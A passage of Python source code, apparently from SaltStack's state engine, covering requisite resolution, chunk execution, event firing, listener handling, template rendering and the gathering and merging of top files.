except Exception as exc: # pylint: disable=broad-except
log.error(
"Failed to read in pause data for file located at: %s", pause_path
)
return "run"
return "run"
def reconcile_procs(self, running):
"""
Check the running dict for processes and resolve them
"""
retset = set()
for tag in running:
proc = running[tag].get("proc")
if proc:
if not proc.is_alive():
ret_cache = os.path.join(
self.opts["cachedir"],
self.jid,
salt.utils.hashutils.sha1_digest(tag),
)
if not os.path.isfile(ret_cache):
ret = {
"result": False,
"comment": "Parallel process failed to return",
"name": running[tag]["name"],
"changes": {},
}
try:
with salt.utils.files.fopen(ret_cache, "rb") as fp_:
ret = msgpack_deserialize(fp_.read())
except (OSError, IOError):
ret = {
"result": False,
"comment": "Parallel cache failure",
"name": running[tag]["name"],
"changes": {},
}
running[tag].update(ret)
running[tag].pop("proc")
else:
retset.add(False)
return False not in retset
def check_requisite(self, low, running, chunks, pre=False):
"""
Look into the running data to check the status of all requisite
states
"""
present = False
# If mod_watch is not available make it a require
if "watch" in low:
if "{0}.mod_watch".format(low["state"]) not in self.states:
if "require" in low:
low["require"].extend(low.pop("watch"))
else:
low["require"] = low.pop("watch")
else:
present = True
if "watch_any" in low:
if "{0}.mod_watch".format(low["state"]) not in self.states:
if "require_any" in low:
low["require_any"].extend(low.pop("watch_any"))
else:
low["require_any"] = low.pop("watch_any")
else:
present = True
if "require" in low:
present = True
if "require_any" in low:
present = True
if "prerequired" in low:
present = True
if "prereq" in low:
present = True
if "onfail" in low:
present = True
if "onfail_any" in low:
present = True
if "onchanges" in low:
present = True
if "onchanges_any" in low:
present = True
if not present:
return "met", ()
self.reconcile_procs(running)
reqs = {
"require": [],
"require_any": [],
"watch": [],
"watch_any": [],
"prereq": [],
"onfail": [],
"onfail_any": [],
"onchanges": [],
"onchanges_any": [],
}
if pre:
reqs["prerequired"] = []
for r_state in reqs:
if r_state in low and low[r_state] is not None:
for req in low[r_state]:
if isinstance(req, six.string_types):
req = {"id": req}
req = trim_req(req)
found = False
for chunk in chunks:
req_key = next(iter(req))
req_val = req[req_key]
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
found = True
reqs[r_state].append(chunk)
continue
try:
if isinstance(req_val, six.string_types):
if fnmatch.fnmatch(
chunk["name"], req_val
) or fnmatch.fnmatch(chunk["__id__"], req_val):
if req_key == "id" or chunk["state"] == req_key:
found = True
reqs[r_state].append(chunk)
else:
raise KeyError
except KeyError as exc:
raise SaltRenderError(
"Could not locate requisite of [{0}] present in state with name [{1}]".format(
req_key, chunk["name"]
)
)
except TypeError:
# On Python 2, the above req_val, being an OrderedDict, will raise a KeyError,
# however on Python 3 it will raise a TypeError
# This was found when running tests.unit.test_state.StateCompilerTestCase.test_render_error_on_invalid_requisite
raise SaltRenderError(
"Could not locate requisite of [{0}] present in state with name [{1}]".format(
req_key, chunk["name"]
)
)
if not found:
return "unmet", ()
fun_stats = set()
for r_state, chunks in six.iteritems(reqs):
req_stats = set()
if r_state.startswith("prereq") and not r_state.startswith("prerequired"):
run_dict = self.pre
else:
run_dict = running
while True:
if self.reconcile_procs(run_dict):
break
time.sleep(0.01)
for chunk in chunks:
tag = _gen_tag(chunk)
if tag not in run_dict:
req_stats.add("unmet")
continue
if r_state.startswith("onfail"):
if run_dict[tag]["result"] is True:
req_stats.add("onfail") # At least one state is OK
continue
else:
if run_dict[tag]["result"] is False:
req_stats.add("fail")
continue
if r_state.startswith("onchanges"):
if not run_dict[tag]["changes"]:
req_stats.add("onchanges")
else:
req_stats.add("onchangesmet")
continue
if r_state.startswith("watch") and run_dict[tag]["changes"]:
req_stats.add("change")
continue
if r_state.startswith("prereq") and run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("premet")
if r_state.startswith("prereq") and not run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("pre")
else:
if run_dict[tag].get("__state_ran__", True):
req_stats.add("met")
if r_state.endswith("_any"):
if "met" in req_stats or "change" in req_stats:
if "fail" in req_stats:
req_stats.remove("fail")
if "onchangesmet" in req_stats:
if "onchanges" in req_stats:
req_stats.remove("onchanges")
if "fail" in req_stats:
req_stats.remove("fail")
if "onfail" in req_stats:
if "fail" in req_stats:
req_stats.remove("onfail")
fun_stats.update(req_stats)
if "unmet" in fun_stats:
status = "unmet"
elif "fail" in fun_stats:
status = "fail"
elif "pre" in fun_stats:
if "premet" in fun_stats:
status = "met"
else:
status = "pre"
elif "onfail" in fun_stats and "met" not in fun_stats:
status = "onfail" # all onfail states are OK
elif "onchanges" in fun_stats and "onchangesmet" not in fun_stats:
status = "onchanges"
elif "change" in fun_stats:
status = "change"
else:
status = "met"
return status, reqs
def event(self, chunk_ret, length, fire_event=False):
"""
Fire an event on the master bus
If `fire_event` is set to True an event will be sent with the
chunk name in the tag and the chunk result in the event data.
If `fire_event` is set to a string such as `mystate/is/finished`,
an event will be sent with the string added to the tag and the chunk
result in the event data.
If the `state_events` is set to True in the config, then after the
chunk is evaluated an event will be set up to the master with the
results.
"""
if not self.opts.get("local") and (
self.opts.get("state_events", True) or fire_event
):
if not self.opts.get("master_uri"):
ev_func = lambda ret, tag, preload=None: salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
).fire_event(
ret, tag
)
else:
ev_func = self.functions["event.fire_master"]
ret = {"ret": chunk_ret}
if fire_event is True:
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], six.text_type(chunk_ret["name"])],
"state_result",
)
elif isinstance(fire_event, six.string_types):
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], six.text_type(fire_event)],
"state_result",
)
else:
tag = salt.utils.event.tagify(
[
self.jid,
"prog",
self.opts["id"],
six.text_type(chunk_ret["__run_num__"]),
],
"job",
)
ret["len"] = length
preload = {"jid": self.jid}
ev_func(ret, tag, preload=preload)
def call_chunk(self, low, running, chunks):
"""
Check if a chunk has any requires, execute the requires and then
the chunk
"""
low = self._mod_aggregate(low, running, chunks)
self._mod_init(low)
tag = _gen_tag(low)
if not low.get("prerequired"):
self.active.add(tag)
requisites = [
"require",
"require_any",
"watch",
"watch_any",
"prereq",
"onfail",
"onfail_any",
"onchanges",
"onchanges_any",
]
if not low.get("__prereq__"):
requisites.append("prerequired")
status, reqs = self.check_requisite(low, running, chunks, pre=True)
else:
status, reqs = self.check_requisite(low, running, chunks)
if status == "unmet":
lost = {}
reqs = []
for requisite in requisites:
lost[requisite] = []
if requisite not in low:
continue
for req in low[requisite]:
if isinstance(req, six.string_types):
req = {"id": req}
req = trim_req(req)
found = False
req_key = next(iter(req))
req_val = req[req_key]
for chunk in chunks:
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
if requisite == "prereq":
chunk["__prereq__"] = True
reqs.append(chunk)
found = True
continue
if fnmatch.fnmatch(chunk["name"], req_val) or fnmatch.fnmatch(
chunk["__id__"], req_val
):
if req_key == "id" or chunk["state"] == req_key:
if requisite == "prereq":
chunk["__prereq__"] = True
elif requisite == "prerequired":
chunk["__prerequired__"] = True
reqs.append(chunk)
found = True
if not found:
lost[requisite].append(req)
if (
lost["require"]
or lost["watch"]
or lost["prereq"]
or lost["onfail"]
or lost["onchanges"]
or lost.get("prerequired")
):
comment = "The following requisites were not found:\n"
for requisite, lreqs in six.iteritems(lost):
if not lreqs:
continue
comment += "{0}{1}:\n".format(" " * 19, requisite)
for lreq in lreqs:
req_key = next(iter(lreq))
req_val = lreq[req_key]
comment += "{0}{1}: {2}\n".format(" " * 23, req_key, req_val)
if low.get("__prereq__"):
run_dict = self.pre
else:
run_dict = running
start_time, duration = _calculate_fake_duration()
run_dict[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(run_dict[tag], len(chunks), fire_event=low.get("fire_event"))
return running
for chunk in reqs:
# Check to see if the chunk has been run, only run it if
# it has not been run already
ctag = _gen_tag(chunk)
if ctag not in running:
if ctag in self.active:
if chunk.get("__prerequired__"):
# Prereq recusive, run this chunk with prereq on
if tag not in self.pre:
low["__prereq__"] = True
self.pre[ctag] = self.call(low, chunks, running)
return running
else:
return running
elif ctag not in running:
log.error("Recursive requisite found")
running[tag] = {
"changes": {},
"result": False,
"comment": "Recursive requisite found",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(
running[tag], len(chunks), fire_event=low.get("fire_event")
)
return running
running = self.call_chunk(chunk, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
if low.get("__prereq__"):
status, reqs = self.check_requisite(low, running, chunks)
self.pre[tag] = self.call(low, chunks, running)
if not self.pre[tag]["changes"] and status == "change":
self.pre[tag]["changes"] = {"watch": "watch"}
self.pre[tag]["result"] = None
else:
running = self.call_chunk(low, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
elif status == "met":
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
elif status == "fail":
# if the requisite that failed was due to a prereq on this low state
# show the normal error
if tag in self.pre:
running[tag] = self.pre[tag]
running[tag]["__run_num__"] = self.__run_num
running[tag]["__sls__"] = low["__sls__"]
# otherwise the failure was due to a requisite down the chain
else:
# determine what the requisite failures where, and return
# a nice error message
failed_requisites = set()
# look at all requisite types for a failure
for req_lows in six.itervalues(reqs):
for req_low in req_lows:
req_tag = _gen_tag(req_low)
req_ret = self.pre.get(req_tag, running.get(req_tag))
# if there is no run output for the requisite it
# can't be the failure
if req_ret is None:
continue
# If the result was False (not None) it was a failure
if req_ret["result"] is False:
# use SLS.ID for the key-- so its easier to find
key = "{sls}.{_id}".format(
sls=req_low["__sls__"], _id=req_low["__id__"]
)
failed_requisites.add(key)
_cmt = "One or more requisite failed: {0}".format(
", ".join(six.text_type(i) for i in failed_requisites)
)
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": _cmt,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.pre[tag] = running[tag]
self.__run_num += 1
elif status == "change" and not low.get("__prereq__"):
ret = self.call(low, chunks, running)
if not ret["changes"] and not ret.get("skip_watch", False):
low = low.copy()
low["sfun"] = low["fun"]
low["fun"] = "mod_watch"
low["__reqs__"] = reqs
ret = self.call(low, chunks, running)
running[tag] = ret
elif status == "pre":
start_time, duration = _calculate_fake_duration()
pre_ret = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "No changes detected",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
running[tag] = pre_ret
self.pre[tag] = pre_ret
self.__run_num += 1
elif status == "onfail":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because onfail req did not change",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
elif status == "onchanges":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because none of the onchanges reqs changed",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
else:
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
if tag in running:
self.event(running[tag], len(chunks), fire_event=low.get("fire_event"))
return running
def call_listen(self, chunks, running):
"""
Find all of the listen routines and call the associated mod_watch runs
"""
listeners = []
crefs = {}
for chunk in chunks:
crefs[(chunk["state"], chunk["__id__"], chunk["name"])] = chunk
if "listen" in chunk:
listeners.append(
{(chunk["state"], chunk["__id__"], chunk["name"]): chunk["listen"]}
)
if "listen_in" in chunk:
for l_in in chunk["listen_in"]:
for key, val in six.iteritems(l_in):
listeners.append(
{(key, val, "lookup"): [{chunk["state"]: chunk["__id__"]}]}
)
mod_watchers = []
errors = {}
for l_dict in listeners:
for key, val in six.iteritems(l_dict):
for listen_to in val:
if not isinstance(listen_to, dict):
found = False
for chunk in chunks:
if (
chunk["__id__"] == listen_to
or chunk["name"] == listen_to
):
listen_to = {chunk["state"]: chunk["__id__"]}
found = True
if not found:
continue
for lkey, lval in six.iteritems(listen_to):
if not any(lkey == cref[0] and lval in cref for cref in crefs):
rerror = {
_l_tag(lkey, lval): {
"comment": "Referenced state {0}: {1} does not exist".format(
lkey, lval
),
"name": "listen_{0}:{1}".format(lkey, lval),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
to_tags = [
_gen_tag(data)
for cref, data in six.iteritems(crefs)
if lkey == cref[0] and lval in cref
]
for to_tag in to_tags:
if to_tag not in running:
continue
if running[to_tag]["changes"]:
if not any(
key[0] == cref[0] and key[1] in cref
for cref in crefs
):
rerror = {
_l_tag(key[0], key[1]): {
"comment": "Referenced state {0}: {1} does not exist".format(
key[0], key[1]
),
"name": "listen_{0}:{1}".format(
key[0], key[1]
),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
new_chunks = [
data
for cref, data in six.iteritems(crefs)
if key[0] == cref[0] and key[1] in cref
]
for chunk in new_chunks:
low = chunk.copy()
low["sfun"] = chunk["fun"]
low["fun"] = "mod_watch"
low["__id__"] = "listener_{0}".format(low["__id__"])
for req in STATE_REQUISITE_KEYWORDS:
if req in low:
low.pop(req)
mod_watchers.append(low)
ret = self.call_chunks(mod_watchers)
running.update(ret)
for err in errors:
errors[err]["__run_num__"] = self.__run_num
self.__run_num += 1
running.update(errors)
return running
def call_high(self, high, orchestration_jid=None):
"""
Process a high data call and ensure the defined states.
"""
errors = []
# If there is extension data reconcile it
high, ext_errors = self.reconcile_extend(high)
errors.extend(ext_errors)
errors.extend(self.verify_high(high))
if errors:
return errors
high, req_in_errors = self.requisite_in(high)
errors.extend(req_in_errors)
high = self.apply_exclude(high)
# Verify that the high data is structurally sound
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.compile_high_data(high, orchestration_jid)
# If there are extensions in the highstate, process them and update
# the low data chunks
if errors:
return errors
ret = self.call_chunks(chunks)
ret = self.call_listen(chunks, ret)
def _cleanup_accumulator_data():
accum_data_path = os.path.join(
get_accumulator_dir(self.opts["cachedir"]), self.instance_id
)
try:
os.remove(accum_data_path)
log.debug("Deleted accumulator data file %s", accum_data_path)
except OSError:
log.debug("File %s does not exist, no need to cleanup", accum_data_path)
_cleanup_accumulator_data()
if self.jid is not None:
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
if os.path.isfile(pause_path):
try:
os.remove(pause_path)
except OSError:
# File is not present, all is well
pass
return ret
def render_template(self, high, template):
errors = []
if not high:
return high, errors
if not isinstance(high, dict):
errors.append(
"Template {0} does not render to a dictionary".format(template)
)
return high, errors
invalid_items = ("include", "exclude", "extends")
for item in invalid_items:
if item in high:
errors.append(
"The '{0}' declaration found on '{1}' is invalid when "
"rendering single templates".format(item, template)
)
return high, errors
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], six.string_types):
# Is this is a short state, it needs to be padded
if "." in high[name]:
comps = high[name].split(".")
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
errors.append(
"ID {0} in template {1} is not a dictionary".format(
name, template
)
)
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if high[name][key] is None:
errors.append(
"ID '{0}' in template {1} contains a short "
"declaration ({2}) with a trailing colon. When not "
"passing any arguments to a state, the colon must be "
"omitted.".format(name, template, key)
)
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{0}' in template '{1}' contains multiple "
"state declarations of the same type".format(name, template)
)
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high, errors
def call_template(self, template):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, template)
if errors:
return errors
return self.call_high(high)
def call_template_str(self, template):
"""
Enforce the states in a template, pass the template as a string
"""
high = compile_template_str(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, "<template-str>")
if errors:
return errors
return self.call_high(high)
class BaseHighState(object):
"""
The BaseHighState is an abstract base class that is the foundation of
running a highstate, extend it and add a self.state object of type State.
When extending this class, please note that ``self.client`` and
``self.matcher`` should be instantiated and handled.
"""
def __init__(self, opts):
self.opts = self.__gen_opts(opts)
self.iorder = 10000
self.avail = self.__gather_avail()
self.serial = salt.payload.Serial(self.opts)
self.building_highstate = OrderedDict()
def __gather_avail(self):
"""
Gather the lists of available sls data from the master
"""
avail = {}
for saltenv in self._get_envs():
avail[saltenv] = self.client.list_states(saltenv)
return avail
def __gen_opts(self, opts):
"""
The options used by the High State object are derived from options
on the minion and the master, or just the minion if the high state
call is entirely local.
"""
# If the state is intended to be applied locally, then the local opts
# should have all of the needed data, otherwise overwrite the local
# data items with data from the master
if "local_state" in opts:
if opts["local_state"]:
return opts
mopts = self.client.master_opts()
if not isinstance(mopts, dict):
# An error happened on the master
opts["renderer"] = "jinja|yaml"
opts["failhard"] = False
opts["state_top"] = salt.utils.url.create("top.sls")
opts["nodegroups"] = {}
opts["file_roots"] = {"base": [syspaths.BASE_FILE_ROOTS_DIR]}
else:
opts["renderer"] = mopts["renderer"]
opts["failhard"] = mopts.get("failhard", False)
if mopts["state_top"].startswith("salt://"):
opts["state_top"] = mopts["state_top"]
elif mopts["state_top"].startswith("/"):
opts["state_top"] = salt.utils.url.create(mopts["state_top"][1:])
else:
opts["state_top"] = salt.utils.url.create(mopts["state_top"])
opts["state_top_saltenv"] = mopts.get("state_top_saltenv", None)
opts["nodegroups"] = mopts.get("nodegroups", {})
opts["state_auto_order"] = mopts.get(
"state_auto_order", opts["state_auto_order"]
)
opts["file_roots"] = mopts["file_roots"]
opts["top_file_merging_strategy"] = mopts.get(
"top_file_merging_strategy", opts.get("top_file_merging_strategy")
)
opts["env_order"] = mopts.get("env_order", opts.get("env_order", []))
opts["default_top"] = mopts.get("default_top", opts.get("default_top"))
opts["state_events"] = mopts.get("state_events")
opts["state_aggregate"] = mopts.get(
"state_aggregate", opts.get("state_aggregate", False)
)
opts["jinja_env"] = mopts.get("jinja_env", {})
opts["jinja_sls_env"] = mopts.get("jinja_sls_env", {})
opts["jinja_lstrip_blocks"] = mopts.get("jinja_lstrip_blocks", False)
opts["jinja_trim_blocks"] = mopts.get("jinja_trim_blocks", False)
return opts
def _get_envs(self):
"""
Pull the file server environments out of the master options
"""
envs = ["base"]
if "file_roots" in self.opts:
envs.extend([x for x in list(self.opts["file_roots"]) if x not in envs])
env_order = self.opts.get("env_order", [])
# Remove duplicates while preserving the order
members = set()
env_order = [
env for env in env_order if not (env in members or members.add(env))
]
client_envs = self.client.envs()
if env_order and client_envs:
return [env for env in env_order if env in client_envs]
elif env_order:
return env_order
else:
envs.extend([env for env in client_envs if env not in envs])
return envs
def get_tops(self):
"""
Gather the top files
"""
tops = DefaultOrderedDict(list)
include = DefaultOrderedDict(list)
done = DefaultOrderedDict(list)
found = 0 # did we find any contents in the top files?
# Gather initial top files
merging_strategy = self.opts["top_file_merging_strategy"]
if merging_strategy == "same" and not self.opts["saltenv"]:
if not self.opts["default_top"]:
raise SaltRenderError(
"top_file_merging_strategy set to 'same', but no "
"default_top configuration option was set"
)
if self.opts["saltenv"]:
contents = self.client.cache_file(
self.opts["state_top"], self.opts["saltenv"]
)
if contents:
found = 1
tops[self.opts["saltenv"]] = [
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=self.opts["saltenv"],
)
]
else:
tops[self.opts["saltenv"]] = [{}]
else:
found = 0
state_top_saltenv = self.opts.get("state_top_saltenv", False)
if state_top_saltenv and not isinstance(
state_top_saltenv, six.string_types
):
state_top_saltenv = six.text_type(state_top_saltenv)
for saltenv in (
[state_top_saltenv] if state_top_saltenv else self._get_envs()
):
contents = self.client.cache_file(self.opts["state_top"], saltenv)
if contents:
found = found + 1
tops[saltenv].append(
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=saltenv,
)
)
else:
tops[saltenv].append({})
log.debug("No contents loaded for saltenv '%s'", saltenv)
if (
found > 1
and merging_strategy == "merge"
and not self.opts.get("env_order", None)
):
log.warning(
"top_file_merging_strategy is set to '%s' and "
"multiple top files were found. Merging order is not "
"deterministic, it may be desirable to either set "
"top_file_merging_strategy to 'same' or use the "
"'env_order' configuration parameter to specify the "
"merging order.",
merging_strategy,
)
if found == 0:
log.debug(
"No contents found in top file. If this is not expected, "
"verify that the 'file_roots' specified in 'etc/master' "
"are accessible. The 'file_roots' configuration is: %s",
repr(self.state.opts["file_roots"]),
)
# Search initial top files for includes
for saltenv, ctops in six.iteritems(tops):
for ctop in ctops:
if "include" not in ctop:
continue
for sls in ctop["include"]:
include[saltenv].append(sls)
ctop.pop("include")
# Go through the includes and pull out the extra tops and add them
while include:
pops = []
for saltenv, states in six.iteritems(include):
pops.append(saltenv)
if not states:
continue
for sls_match in states:
for sls in fnmatch.filter(self.avail[saltenv], sls_match):
if sls in done[saltenv]:
continue
tops[saltenv].append(
compile_template(
self.client.get_state(sls, saltenv).get("dest", False),
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
)
)
done[saltenv].append(sls)
for saltenv in pops:
if saltenv in include:
include.pop(saltenv)
return tops
def merge_tops(self, tops):
"""
Cleanly merge the top files
"""
merging_strategy = self.opts["top_file_merging_strategy"]
try:
merge_attr = "_merge_tops_{0}".format(merging_strategy)
merge_func = getattr(self, merge_attr)
if not hasattr(merge_func, "__call__"):
msg = "'{0}' is not callable".format(merge_attr)
log.error(msg)
raise TypeError(msg)
except (AttributeError, TypeError):
log.warning(
"Invalid top_file_merging_strategy '%s', falling back to " "'merge'",
merging_strategy,
)
merge_func = self._merge_tops_merge
return merge_func(tops)
def _merge_tops_merge(self, tops):
"""
The default merging strategy. The base env is authoritative, so it is
checked first, followed by the remaining environments. In top files
from environments other than "base", only the section matching the
environment from the top file will be considered, and it too will be
ignored if that environment was defined in the "base" top file.
"""
top = DefaultOrderedDict(OrderedDict)
# Check base env first as it is authoritative
base_tops = tops.pop("base", DefaultOrderedDict(OrderedDict))
for ctop in base_tops:
for saltenv, targets in six.iteritems(ctop):
if saltenv == "include":
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
for cenv, ctops in six.iteritems(tops):
for ctop in ctops:
for saltenv, targets in six.iteritems(ctop):
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'merge' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
elif saltenv in top:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as this "
"saltenv was already defined in the 'base' top "
"file",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_same(self, tops):
"""
For each saltenv, only consider the top file from that saltenv. All
sections matching a given saltenv, which appear in a different
saltenv's top file, will be ignored.
"""
top = DefaultOrderedDict(OrderedDict)
for cenv, ctops in six.iteritems(tops):
if all([x == {} for x in ctops]):
# No top file found in this env, check the default_top
default_top = self.opts["default_top"]
fallback_tops = tops.get(default_top, [])
if all([x == {} for x in fallback_tops]):
# Nothing in the fallback top file
log.error(
"The '%s' saltenv has no top file, and the fallback "
"saltenv specified by default_top (%s) also has no "
"top file",
cenv,
default_top,
)
continue
for ctop in fallback_tops:
for saltenv, targets in six.iteritems(ctop):
if saltenv != cenv:
continue
log.debug(
"The '%s' saltenv has no top file, using the "
"default_top saltenv (%s)",
cenv,
default_top,
)
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
break
else:
log.error(
"The '%s' saltenv has no top file, and no "
"matches were found in the top file for the "
"default_top saltenv (%s)",
cenv,
default_top,
)
continue
else:
for ctop in ctops:
for saltenv, targets in six.iteritems(ctop):
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'same' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_merge_all(self, tops):
"""
Merge the top files into a single dictionary
"""
def _read_tgt(tgt):
match_type = None
states = []
for item in tgt:
if isinstance(item, dict):
match_type = item
if isinstance(item, six.string_types):
states.append(item)
return match_type, states
top = DefaultOrderedDict(OrderedDict)
for ctops in six.itervalues(tops):
for ctop in ctops:
for saltenv, targets in six.iteritems(ctop):
if saltenv == "include":
continue
try:
for tgt in targets:
if tgt not in top[saltenv]:
top[saltenv][tgt] = ctop[saltenv][tgt]
continue
m_type1, m_states1 = _read_tgt(top[saltenv][tgt])
m_type2, m_states2 = _read_tgt(ctop[saltenv][tgt])
merged = []
match_type = m_type2 or m_type1
if match_type is not None:
merged.append(match_type)
merged.extend(m_states1)
merged.extend([x for x in m_states2 if x not in merged])
top[saltenv][tgt] = merged
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def verify_tops(self, tops):
"""
Verify the contents of the top file data
"""
errors = []
if not isinstance(tops, dict):
errors.append("Top data was not formed as a dict")
# No further checks will work, bail out
return errors
for saltenv, matches in six.iteritems(tops):
if saltenv == "include":
continue
if not isinstance(saltenv, six.string_types):
errors.append(
"Environment {0} in top file is not formed as a "
"string".format(saltenv)
)
if saltenv == "":
errors.append("Empty saltenv statement in top file")
if not isinstance(matches, dict):
errors.append(
"The top file matches for saltenv {0} are not "
"formatted as a dict".format(saltenv)
)
for slsmods in six.itervalues(matches):
if not isinstance(slsmods, list):
errors.append(
"Malformed topfile (state declarations not " "formed as a list)"
)
continue
for slsmod in slsmods:
if isinstance(slsmod, dict):
# This value is a match option
for val in six.itervalues(slsmod):
if not val:
errors.append(
"Improperly formatted top file matcher "
"in saltenv {0}: {1} file".format(slsmod, val)
)
elif isinstance(slsmod, six.string_types):
# This is a sls module
if not slsmod:
errors.append(
"Environment {0} contains an empty sls "
"index".format(saltenv)
)
return errors
def get_top(self):
"""
Returns the high data derived from the top file
"""
try:
tops = self.get_tops()
except SaltRenderError as err:
log.error("Unable to render top file: %s", err.error)
return {}
return self.merge_tops(tops)
def top_matches(self, top):
"""
Search through the top high data for matches and return the states
that this minion needs to execute.
Returns:
{'saltenv': ['state1', 'state2', ...]}
"""
matches = DefaultOrderedDict(OrderedDict)
# pylint: disable=cell-var-from-loop
for saltenv, body in six.iteritems(top):
if self.opts["saltenv"]:
if saltenv != self.opts["saltenv"]:
continue
for match, data in six.iteritems(body):
def _filter_matches(_match, _data, _opts):
if isinstance(_data, six.string_types):
_data = [_data]
if self.matchers["confirm_top.confirm_top"](_match, _data, _opts):
if saltenv not in matches:
matches[saltenv] = []
for item in _data:
if "subfilter" in item:
_tmpdata = item.pop("subfilter")
for match, data in six.iteritems(_tmpdata):
_filter_matches(match, data, _opts)
if isinstance(item, six.string_types):
matches[saltenv].append(item)
elif isinstance(item, dict):
env_key, inc_sls = item.popitem()
if env_key not in self.avail:
continue
if env_key not in matches:
matches[env_key] = []
matches[env_key].append(inc_sls)
_filter_matches(match, data, self.opts["nodegroups"])
ext_matches = self._master_tops()
for saltenv in ext_matches:
top_file_matches = matches.get(saltenv, [])
if self.opts.get("master_tops_first"):
first = ext_matches[saltenv]
second = top_file_matches
else:
first = top_file_matches
second = ext_matches[saltenv]
matches[saltenv] = first + [x for x in second if x not in first]
# pylint: enable=cell-var-from-loop
return matches
def _master_tops(self):
"""
Get results from the master_tops system. Override this function if the
execution of the master_tops needs customization.
"""
return self.client.master_tops()
def load_dynamic(self, matches):
"""
If autoload_dynamic_modules is True then automatically load the
dynamic modules
"""
if not self.opts["autoload_dynamic_modules"]:
return
syncd = self.state.functions["saltutil.sync_all"](list(matches), refresh=False)
if syncd["grains"]:
self.opts["grains"] = salt.loader.grains(self.opts)
self.state.opts["pillar"] = self.state._gather_pillar()
self.state.module_refresh()
def render_state(self, sls, saltenv, mods, matches, local=False):
"""
Render a state file and retrieve all of the include states
"""
errors = []
if not local:
state_data = self.client.get_state(sls, saltenv)
fn_ = state_data.get("dest", False)
else:
fn_ = sls
if not os.path.isfile(fn_):
errors.append(
"Specified SLS {0} on local filesystem cannot "
"be found.".format(sls)
)
state = None
if not fn_:
errors.append(
"Specified SLS {0} in saltenv {1} is not "
"available on the salt master or through a configured "
"fileserver".format(sls, saltenv)
)
else:
try:
state = compile_template(
fn_,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
sls,
rendered_sls=mods,
)
